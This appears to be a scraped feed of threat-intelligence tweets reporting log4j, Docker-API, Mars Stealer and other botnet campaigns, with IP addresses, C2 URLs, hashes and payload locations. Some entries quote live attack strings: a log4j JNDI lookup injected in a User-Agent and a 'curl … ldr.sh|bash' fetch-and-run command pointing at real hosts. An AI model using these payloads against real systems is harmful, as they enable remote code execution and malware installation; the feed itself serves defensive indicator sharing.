IoT Botnet Exploiting #CVE-2021-44228 #log4j . User-Agent: ${jndi:ldap://179.43.175.101:1389/o=tomcat} .The payload is JavaScript code executed in Java using ScriptEngineManager. IOCs and sample:

RT @banthisguy9349: #microsoft just released a article related to #NorthKorean #ThreatActors . Seems to be that th….

RT @Shadowserver: We are proud to have assisted (along with partners) in the US DoJ & FBI-led disruption of the Moobot malware botnet compr….

RT @malwaremustd1e: 📢 In #FIRSTCTI22, @unixfreaxjp w/ LACERT teams will share the implementation of @FIRSTdotOrg #CTI Curriculum methods in….

RT @HackingDave: Follina patch CVE-2022-30190. (msdt.exe) is out.

RT @1ZRR4H: Están llegando los mineros! 🤖 (CVE-2022-1388). IP atacante: 85.106.114.175 🇹🇷.Payload: curl 202.28.229.174/ldr.sh|bash. Muestra….

RT @eric_capuano: Everybody is familiar with the value of a tool like VirusTotal for malware. Ever wanted a similar tool for analyzing _….

RT @0xrb: 𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia.Threat Actor keep changing urls.C2 Domain : http://jsdkca(.)link/….

RT @virustotal: VirusTotal welcomes @elfdigest to the VT multi-sandbox project! by @karlhiramoto.

RT @0xrb: Currently 𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia.They are targeting again India, Brazil, Indonesia,Egyp….

RT @0xrb: Recently deployed #Mars #Stealer #Malware .C2: http://62.204.41.180/5xtELSMXvf.php .Hash:.4d0b2e81d023a1704d0fb71cf3e689ec43a81….

RT @malwaremustd1e: Will you be interested to join our #shellcode ADVANCED workshop w/#radare2 to study & RE on how recent threats are usin….

RT @0xrb: Recent Chinese Threat Actor #Winnti panel .C2: .ip: 204.15.78.131:3220 (TCP).url: us\.\host.skybad\.\top.Actual Payload hosted he….

@1ZRR4H @ankit_anubhav @malwrhunterteam @0xrb Another server used in the same campaign:.80.92.204.82 🇩🇪.

@1ZRR4H @ankit_anubhav @malwrhunterteam @0xrb The malware hosting server has moved to: .195.2.81.27 🇷🇺.

Active #Kinsing #cryptomining campaign targeting exposed Docker API.IoCs:.hxxp://185.231.153.4/d.sh 🇷🇺.scanner/loader: 95.182.120.39 🇷🇺.initial payload: kinsing bin:

an update of the same botnet, another shellscript payload: hxxp://oracle.zzhreceive.top/b2f628fff19fda999999999/dktest.sh.bazaar:

Cryptomining #Linux #botnet exploiting exposed Docker APIs:.- shell-script as initial payload.- uses Diamorphine and LD_PRELOAD rootkits.- drops Tsunami bin with .jpg extension.- looks for SSH keys and AWS creds (Team-TNT code reuse).IoCs and analysis:.

RT @0xrb: Another large size net associated with #SystemBC .Malware c2 (31.44.185(.)11) From Russia ( WebLine LTD ).more than 16000 victim….

#Kinsing botnet exploiting #log4j .IoCs:.ldap/web: 178[.]20[.]40[.]227.kinsing bin: curl-amd64:.6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3.libsystem .so: c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

Tsunami botnet update .#log4j.IoC:.ldap 135.148.132.224:1389.hxxp://106.246.224.219/.l/pty3.hxxp://106.246.224.219/.l/pty4.MalwareBazaar :.